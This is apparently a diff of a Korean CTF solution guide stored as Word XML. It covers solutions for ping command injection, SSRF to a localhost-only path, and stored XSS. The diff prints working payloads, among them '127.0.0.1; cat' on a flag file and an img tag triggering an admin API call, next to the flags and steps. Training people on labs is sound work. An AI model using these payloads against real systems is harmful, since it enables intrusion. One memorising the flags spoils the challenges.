           <w:tcPr>
-            <w:tcW w:type="dxa" w:w="4320"/>
+            <w:tcW w:type="dxa" w:w="4896"/>
+            <w:vAlign w:val="center"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r/>
             <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic" w:eastAsia="Malgun Gothic"/>
+                <w:b w:val="0"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
               <w:t>350</w:t>
             </w:r>
           </w:p>
@@ -2070,27 +3331,60 @@
       <w:tr>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:type="dxa" w:w="4320"/>
-            <w:shd w:fill="EAF2F8"/>
+            <w:tcW w:type="dxa" w:w="4896"/>
+            <w:vAlign w:val="center"/>
+            <w:shd w:fill="E8EEDF"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r/>
             <w:r>
-              <w:t>목표</w:t>
+              <w:rPr>
+                <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic" w:eastAsia="Malgun Gothic"/>
+                <w:b/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>FLAG</w:t>
             </w:r>
           </w:p>
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:type="dxa" w:w="4320"/>
+            <w:tcW w:type="dxa" w:w="4896"/>
+            <w:vAlign w:val="center"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r/>
             <w:r>
-              <w:t>host 입력값이 ping 명령 뒤에 그대로 붙는 점을 이용해 추가 명령을 실행한다.</w:t>
+              <w:rPr>
+                <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic" w:eastAsia="Malgun Gothic"/>
+                <w:b w:val="0"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>FLAG{ops_ping_command_injection}</w:t>
             </w:r>
           </w:p>
         </w:tc>
       </w:tr>
     </w:tbl>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+      </w:pPr>
+      <w:r>
+        <w:t>목표</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>ping 명령 뒤에 추가 명령을 이어 붙여 플래그 파일을 출력한다.</w:t>
+      </w:r>
+    </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
@@ -2102,30 +3396,34 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="ListNumber"/>
+        <w:spacing w:after="120" w:line="300" w:lineRule="auto"/>
       </w:pPr>
       <w:r>
-        <w:t>정상 IP를 입력해 ping 결과가 출력되는지 확인한다.</w:t>
+        <w:t>정상 IP를 입력해 출력 형태를 확인한다.</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="ListNumber"/>
+        <w:spacing w:after="120" w:line="300" w:lineRule="auto"/>
       </w:pPr>
       <w:r>
-        <w:t>host 값이 shell_exec로 실행되는 명령 뒤에 붙는 구조임을 확인한다.</w:t>
+        <w:t>입력값이 ping 명령 뒤에 붙는 구조를 확인한다.</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="ListNumber"/>
+        <w:spacing w:after="120" w:line="300" w:lineRule="auto"/>
       </w:pPr>
       <w:r>
-        <w:t>셸 구분자 ; 또는 &amp;&amp; 뒤에 파일 출력 명령을 붙인다.</w:t>
+        <w:t>; 또는 &amp;&amp; 뒤에 cat 명령을 붙인다.</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="ListNumber"/>
+        <w:spacing w:after="120" w:line="300" w:lineRule="auto"/>
       </w:pPr>
       <w:r>
         <w:t>/tmp/est-net-diagnostics-flag.txt 내용을 출력한다.</w:t>
@@ -2136,17 +3434,18 @@
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
       <w:r>
-        <w:t>핵심 페이로드</w:t>
+        <w:t>핵심 입력</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:spacing w:after="120"/>
-        <w:ind w:left="288"/>
+        <w:spacing w:before="80" w:after="200" w:line="276" w:lineRule="auto"/>
+        <w:ind w:left="216"/>
       </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Malgun Gothic"/>
+          <w:color w:val="212D18"/>
           <w:sz w:val="18"/>
         </w:rPr>
         <w:t>127.0.0.1; cat /tmp/est-net-diagnostics-flag.txt</w:t>
@@ -2157,64 +3456,82 @@
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
       <w:r>
-        <w:t>정답</w:t>
+        <w:t>핵심 포인트</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>사용자 입력이 셸 명령 문자열로 조립될 때 발생한다.</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:spacing w:after="120"/>
-        <w:ind w:left="288"/>
+        <w:sectPr>
+          <w:pgSz w:w="12240" w:h="15840"/>
+          <w:pgMar w:top="1080" w:right="1224" w:bottom="1080" w:left="1224" w:header="720" w:footer="720" w:gutter="0"/>
+          <w:cols w:space="720"/>
+          <w:docGrid w:linePitch="360"/>
+        </w:sectPr>
       </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Malgun Gothic"/>
-          <w:sz w:val="18"/>
-        </w:rPr>
-        <w:t>FLAG{ops_ping_command_injection}</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>메모: 사용자 입력을 셸 명령 문자열로 조립하면 명령 구분자를 통해 다른 명령이 실행될 수 있다.</w:t>
-      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading1"/>
       </w:pPr>
       <w:r>
-        <w:t>8. 관리관 메모 연쇄</w:t>
+        <w:t>8. 내부 보급망 점검기</w:t>
       </w:r>
     </w:p>
     <w:tbl>
       <w:tblPr>
         <w:tblStyle w:val="TableGrid"/>
         <w:tblW w:type="auto" w:w="0"/>
+        <w:jc w:val="center"/>
         <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
       </w:tblPr>
       <w:tblGrid>
-        <w:gridCol w:w="4320"/>
-        <w:gridCol w:w="4320"/>
+        <w:gridCol w:w="4896"/>
+        <w:gridCol w:w="4896"/>
       </w:tblGrid>
       <w:tr>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:type="dxa" w:w="4320"/>
-            <w:shd w:fill="EAF2F8"/>
+            <w:tcW w:type="dxa" w:w="4896"/>
+            <w:vAlign w:val="center"/>
+            <w:shd w:fill="E8EEDF"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r/>
             <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic" w:eastAsia="Malgun Gothic"/>
+                <w:b/>
+                <w:sz w:val="18"/>
+              </w:rPr>
               <w:t>문제 ID</w:t>
             </w:r>
           </w:p>
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:type="dxa" w:w="4320"/>
+            <w:tcW w:type="dxa" w:w="4896"/>
+            <w:vAlign w:val="center"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r/>
             <w:r>
-              <w:t>admin-memo-chain</w:t>
+              <w:rPr>
+                <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic" w:eastAsia="Malgun Gothic"/>
+                <w:b w:val="0"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>internal-supply</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -2222,22 +3539,42 @@
       <w:tr>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:type="dxa" w:w="4320"/>
-            <w:shd w:fill="EAF2F8"/>
+            <w:tcW w:type="dxa" w:w="4896"/>
+            <w:vAlign w:val="center"/>
+            <w:shd w:fill="E8EEDF"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r/>
             <w:r>
-              <w:t>분류/난이도</w:t>
+              <w:rPr>
+                <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic" w:eastAsia="Malgun Gothic"/>
+                <w:b/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>분류 / 난이도</w:t>
             </w:r>
           </w:p>
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:type="dxa" w:w="4320"/>
+            <w:tcW w:type="dxa" w:w="4896"/>
+            <w:vAlign w:val="center"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r/>
             <w:r>
-              <w:t>Stored XSS / 고급</w:t>
+              <w:rPr>
+                <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic" w:eastAsia="Malgun Gothic"/>
+                <w:b w:val="0"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>SSRF / 중상급</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -2245,22 +3582,42 @@
       <w:tr>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:type="dxa" w:w="4320"/>
-            <w:shd w:fill="EAF2F8"/>
+            <w:tcW w:type="dxa" w:w="4896"/>
+            <w:vAlign w:val="center"/>
+            <w:shd w:fill="E8EEDF"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r/>
             <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic" w:eastAsia="Malgun Gothic"/>
+                <w:b/>
+                <w:sz w:val="18"/>
+              </w:rPr>
               <w:t>전과</w:t>
             </w:r>
           </w:p>
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:type="dxa" w:w="4320"/>
+            <w:tcW w:type="dxa" w:w="4896"/>
+            <w:vAlign w:val="center"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r/>
             <w:r>
-              <w:t>400</w:t>
+              <w:rPr>
+                <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic" w:eastAsia="Malgun Gothic"/>
+                <w:b w:val="0"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>375</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -2268,27 +3625,60 @@
       <w:tr>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:type="dxa" w:w="4320"/>
-            <w:shd w:fill="EAF2F8"/>
+            <w:tcW w:type="dxa" w:w="4896"/>
+            <w:vAlign w:val="center"/>
+            <w:shd w:fill="E8EEDF"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r/>
             <w:r>
-              <w:t>목표</w:t>
+              <w:rPr>
+                <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic" w:eastAsia="Malgun Gothic"/>
+                <w:b/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>FLAG</w:t>
             </w:r>
           </w:p>
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:type="dxa" w:w="4320"/>
+            <w:tcW w:type="dxa" w:w="4896"/>
+            <w:vAlign w:val="center"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r/>
             <w:r>
-              <w:t>저장된 메모가 HTML로 렌더링되는 점을 이용해 관리관 전용 API 호출을 유도한다.</w:t>
+              <w:rPr>
+                <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic" w:eastAsia="Malgun Gothic"/>
+                <w:b w:val="0"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>FLAG{ssrf_internal_supply_route}</w:t>
             </w:r>
           </w:p>
         </w:tc>
       </w:tr>
     </w:tbl>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+      </w:pPr>
+      <w:r>
+        <w:t>목표</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>서버의 대리 조회 기능으로 내부 전용 경로에 접근한다.</w:t>
+      </w:r>
+    </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
@@ -2300,33 +3690,37 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="ListNumber"/>
+        <w:spacing w:after="120" w:line="300" w:lineRule="auto"/>
       </w:pPr>
       <w:r>
-        <w:t>메모를 등록하면 페이지에 다시 표시되는지 확인한다.</w:t>
+        <w:t>브라우저에서 직접 internal=flag 접근 시 막히는지 확인한다.</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="ListNumber"/>
+        <w:spacing w:after="120" w:line="300" w:lineRule="auto"/>
       </w:pPr>
       <w:r>
-        <w:t>메모 본문이 htmlspecialchars 없이 출력되는지 확인한다.</w:t>
+        <w:t>URL 입력값을 서버가 대신 요청한다는 점을 이용한다.</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="ListNumber"/>
+        <w:spacing w:after="120" w:line="300" w:lineRule="auto"/>
       </w:pPr>
       <w:r>
-        <w:t>HTML 태그를 저장해 브라우저 요청을 발생시킨다.</w:t>
+        <w:t>127.0.0.1 내부 경로를 대리 조회로 호출한다.</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="ListNumber"/>
+        <w:spacing w:after="120" w:line="300" w:lineRule="auto"/>
       </w:pPr>
       <w:r>
-        <w:t>admin_api=flag가 포함된 요청이 검토 흐름에 감지되면 결과 기록에 FLAG가 남는다.</w:t>
+        <w:t>서버 기준 localhost 요청이므로 내부 전용 FLAG가 출력된다.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2334,20 +3728,21 @@
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
       <w:r>
-        <w:t>핵심 페이로드</w:t>
+        <w:t>핵심 입력</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:spacing w:after="120"/>
-        <w:ind w:left="288"/>
+        <w:spacing w:before="80" w:after="200" w:line="276" w:lineRule="auto"/>
+        <w:ind w:left="216"/>
       </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Malgun Gothic"/>
+          <w:color w:val="212D18"/>
           <w:sz w:val="18"/>
         </w:rPr>
-        <w:t>&lt;img src="/challenges/admin-memo-chain.php?admin_api=flag"&gt;</w:t>
+        <w:t>http://127.0.0.1/challenges/internal-supply.php?internal=flag</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2355,64 +3750,82 @@
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
       <w:r>
-        <w:t>정답</w:t>
+        <w:t>핵심 포인트</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>SSRF에서 127.0.0.1은 사용자 PC가 아니라 요청을 보내는 서버 자신이다.</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:spacing w:after="120"/>
-        <w:ind w:left="288"/>
+        <w:sectPr>
+          <w:pgSz w:w="12240" w:h="15840"/>
+          <w:pgMar w:top="1080" w:right="1224" w:bottom="1080" w:left="1224" w:header="720" w:footer="720" w:gutter="0"/>
+          <w:cols w:space="720"/>
+          <w:docGrid w:linePitch="360"/>
+        </w:sectPr>
       </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Malgun Gothic"/>
-          <w:sz w:val="18"/>
-        </w:rPr>
-        <w:t>FLAG{stored_xss_admin_memo_chain}</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>메모: Reflected/DOM XSS와 달리 페이로드가 서버에 저장되고 이후 렌더링 시 실행되는 점이 핵심이다.</w:t>
-      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading1"/>
       </w:pPr>
       <w:r>
-        <w:t>9. 내부 보급망 점검기</w:t>
+        <w:t>9. 관리관 메모 연쇄</w:t>
       </w:r>
     </w:p>
     <w:tbl>
       <w:tblPr>
         <w:tblStyle w:val="TableGrid"/>
         <w:tblW w:type="auto" w:w="0"/>
+        <w:jc w:val="center"/>
         <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
       </w:tblPr>
       <w:tblGrid>
-        <w:gridCol w:w="4320"/>
-        <w:gridCol w:w="4320"/>
+        <w:gridCol w:w="4896"/>
+        <w:gridCol w:w="4896"/>
       </w:tblGrid>
       <w:tr>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:type="dxa" w:w="4320"/>
-            <w:shd w:fill="EAF2F8"/>
+            <w:tcW w:type="dxa" w:w="4896"/>
+            <w:vAlign w:val="center"/>
+            <w:shd w:fill="E8EEDF"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r/>
             <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic" w:eastAsia="Malgun Gothic"/>
+                <w:b/>
+                <w:sz w:val="18"/>
+              </w:rPr>
               <w:t>문제 ID</w:t>
             </w:r>
           </w:p>
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:type="dxa" w:w="4320"/>
+            <w:tcW w:type="dxa" w:w="4896"/>
+            <w:vAlign w:val="center"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r/>
             <w:r>
-              <w:t>internal-supply</w:t>
+              <w:rPr>
+                <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic" w:eastAsia="Malgun Gothic"/>
+                <w:b w:val="0"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>admin-memo-chain</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -2420,22 +3833,42 @@
       <w:tr>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:type="dxa" w:w="4320"/>
-            <w:shd w:fill="EAF2F8"/>
+            <w:tcW w:type="dxa" w:w="4896"/>
+            <w:vAlign w:val="center"/>
+            <w:shd w:fill="E8EEDF"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r/>
             <w:r>
-              <w:t>분류/난이도</w:t>
+              <w:rPr>
+                <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic" w:eastAsia="Malgun Gothic"/>
+                <w:b/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>분류 / 난이도</w:t>
             </w:r>
           </w:p>
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:type="dxa" w:w="4320"/>
+            <w:tcW w:type="dxa" w:w="4896"/>
+            <w:vAlign w:val="center"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r/>
             <w:r>
-              <w:t>SSRF / 중상급</w:t>
+              <w:rPr>
+                <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic" w:eastAsia="Malgun Gothic"/>
+                <w:b w:val="0"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>Stored XSS / 고급</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -2443,22 +3876,42 @@
       <w:tr>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:type="dxa" w:w="4320"/>
-            <w:shd w:fill="EAF2F8"/>
+            <w:tcW w:type="dxa" w:w="4896"/>
+            <w:vAlign w:val="center"/>
+            <w:shd w:fill="E8EEDF"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r/>
             <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic" w:eastAsia="Malgun Gothic"/>
+                <w:b/>
+                <w:sz w:val="18"/>
+              </w:rPr>
               <w:t>전과</w:t>
             </w:r>
           </w:p>
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:type="dxa" w:w="4320"/>
+            <w:tcW w:type="dxa" w:w="4896"/>
+            <w:vAlign w:val="center"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r/>
             <w:r>
-              <w:t>375</w:t>
+              <w:rPr>
+                <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic" w:eastAsia="Malgun Gothic"/>
+                <w:b w:val="0"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>400</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -2466,27 +3919,60 @@
       <w:tr>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:type="dxa" w:w="4320"/>
-            <w:shd w:fill="EAF2F8"/>
+            <w:tcW w:type="dxa" w:w="4896"/>
+            <w:vAlign w:val="center"/>
+            <w:shd w:fill="E8EEDF"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r/>
             <w:r>
-              <w:t>목표</w:t>
+              <w:rPr>
+                <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic" w:eastAsia="Malgun Gothic"/>
+                <w:b/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>FLAG</w:t>
             </w:r>
           </w:p>
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:type="dxa" w:w="4320"/>
+            <w:tcW w:type="dxa" w:w="4896"/>
+            <w:vAlign w:val="center"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r/>
             <w:r>
-              <w:t>서버가 대신 URL을 요청하는 기능으로 localhost 전용 API에 접근한다.</w:t>
+              <w:rPr>
+                <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic" w:eastAsia="Malgun Gothic"/>
+                <w:b w:val="0"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>FLAG{stored_xss_admin_memo_chain}</w:t>
             </w:r>
           </w:p>
         </w:tc>
       </w:tr>
     </w:tbl>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+      </w:pPr>
+      <w:r>
+        <w:t>목표</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>저장된 메모가 HTML로 실행되게 만들어 관리관 API 호출을 유도한다.</w:t>
+      </w:r>
+    </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
@@ -2498,33 +3984,37 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="ListNumber"/>
+        <w:spacing w:after="120" w:line="300" w:lineRule="auto"/>
       </w:pPr>
       <w:r>
-        <w:t>브라우저에서 직접 /challenges/internal-supply.php?internal=flag에 접근하면 403이 발생한다.</w:t>
+        <w:t>메모 본문이 escaping 없이 출력되는지 확인한다.</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="ListNumber"/>
+        <w:spacing w:after="120" w:line="300" w:lineRule="auto"/>
       </w:pPr>
       <w:r>
-        <w:t>문제의 URL 입력칸은 서버가 file_get_contents로 대신 요청한다.</w:t>
+        <w:t>자동 요청을 발생시키는 HTML 태그를 메모로 저장한다.</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="ListNumber"/>
+        <w:spacing w:after="120" w:line="300" w:lineRule="auto"/>
       </w:pPr>
       <w:r>
-        <w:t>입력칸에 127.0.0.1 주소를 넣어 서버가 자기 자신으로 요청하게 만든다.</w:t>
+        <w:t>admin_api=flag 요청을 관리관 검토 흐름에서 처리되게 만든다.</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="ListNumber"/>
+        <w:spacing w:after="120" w:line="300" w:lineRule="auto"/>
       </w:pPr>
       <w:r>
-        <w:t>서버 기준 localhost 요청이므로 내부 전용 FLAG가 출력된다.</w:t>
+        <w:t>검토 결과에 기록된 FLAG를 확인한다.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2532,20 +4022,21 @@
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
       <w:r>
-        <w:t>핵심 페이로드</w:t>
+        <w:t>핵심 입력</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:spacing w:after="120"/>
-        <w:ind w:left="288"/>
+        <w:spacing w:before="80" w:after="200" w:line="276" w:lineRule="auto"/>
+        <w:ind w:left="216"/>
       </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Malgun Gothic"/>
+          <w:color w:val="212D18"/>
           <w:sz w:val="18"/>
         </w:rPr>
-        <w:t>http://127.0.0.1/challenges/internal-supply.php?internal=flag</w:t>
+        <w:t>&lt;img src="/challenges/admin-memo-chain.php?admin_api=flag"&gt;</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2553,26 +4044,23 @@
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
       <w:r>
-        <w:t>정답</w:t>
+        <w:t>핵심 포인트</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>저장된 페이로드가 나중에 렌더링되며 실행되는 점이 reflected XSS와 다르다.</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:spacing w:after="120"/>
-        <w:ind w:left="288"/>
+        <w:sectPr>
+          <w:pgSz w:w="12240" w:h="15840"/>
+          <w:pgMar w:top="1080" w:right="1224" w:bottom="1080" w:left="1224" w:header="720" w:footer="720" w:gutter="0"/>
+          <w:cols w:space="720"/>
+          <w:docGrid w:linePitch="360"/>
+        </w:sectPr>
       </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Malgun Gothic"/>
-          <w:sz w:val="18"/>
-        </w:rPr>
-        <w:t>FLAG{ssrf_internal_supply_route}</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>메모: 브라우저 주소창의 127.0.0.1은 내 PC이고, SSRF 입력칸의 127.0.0.1은 서버 자신이라는 차이가 중요하다.</w:t>
-      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -2586,30 +4074,51 @@
       <w:tblPr>
         <w:tblStyle w:val="TableGrid"/>
         <w:tblW w:type="auto" w:w="0"/>
+        <w:jc w:val="center"/>
         <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
       </w:tblPr>
       <w:tblGrid>
-        <w:gridCol w:w="4320"/>
-        <w:gridCol w:w="4320"/>
+        <w:gridCol w:w="4896"/>
+        <w:gridCol w:w="4896"/>
       </w:tblGrid>
       <w:tr>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:type="dxa" w:w="4320"/>
-            <w:shd w:fill="EAF2F8"/>
+            <w:tcW w:type="dxa" w:w="4896"/>
+            <w:vAlign w:val="center"/>
+            <w:shd w:fill="E8EEDF"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r/>
             <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic" w:eastAsia="Malgun Gothic"/>
+                <w:b/>
+                <w:sz w:val="18"/>
+              </w:rPr>
               <w:t>문제 ID</w:t>
             </w:r>
           </w:p>
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:type="dxa" w:w="4320"/>
+            <w:tcW w:type="dxa" w:w="4896"/>
+            <w:vAlign w:val="center"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r/>
             <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic" w:eastAsia="Malgun Gothic"/>
+                <w:b w:val="0"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
               <w:t>upload-dispatch</w:t>
             </w:r>
           </w:p>
@@ -2618,21 +4127,41 @@
